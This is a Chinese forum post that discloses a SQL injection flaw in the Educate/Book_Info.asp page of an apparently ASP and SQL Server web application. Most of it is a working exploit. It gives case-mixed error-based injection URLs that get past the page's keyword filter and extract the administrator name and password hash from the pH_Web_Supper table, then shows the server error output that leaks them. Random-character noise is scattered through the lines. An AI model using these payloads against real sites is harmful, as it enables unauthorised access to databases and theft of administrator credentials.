漏洞出现在Educate/Book_Info.asp 3 z) J7 r! V: K5 u
& M- M% U+ ~" V" Z/ Z
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出! N0 N3 w; L0 Q' u5 ?
1 M7 f* F3 B2 O- j0 s* t8 s- Qexp:如下
7 H4 \* l' F$ L; \9 x: J查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
6 W; n2 n. D0 @( Y: }: R查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)/ h9 W. a% H+ s7 R5 ]
* @1 E' l# f+ f3 O# K/ Lhttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
! f, j \: x9 Q+ L3 O7 A
9 }$ a# G: C7 m+ R$ G5 FMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'
. z C/ Z0 m; k+ o1 \% b - j. a4 h2 [ I
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
9 K! \5 U9 S& b5 O' }, k2 K4 J( | 8 `2 K* O: @2 y
/Educate/Book_Info.asp,行 8
- u& k- F& W+ u5 L + t6 x% U' L5 ?& _: z, e
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
2 N S! ^' ^! j
1 k: U/ d: q) l$ Z' D0 V4 ^Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
$ D$ F% d6 E. ~0 @) R3 d, P0 n ! Y0 ~( Z* E) I& V; L' J6 @- `
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
& y X. U( q* I8 X( L7 Q- A / O/ ?9 c4 Q: c$ w4 ?
/Educate/Book_Info.asp,行 8
" |7 B: H3 A% s2 O: D/ ]: y7 x |
发表于 2013-2-16 21:44:16
收藏
支持
反对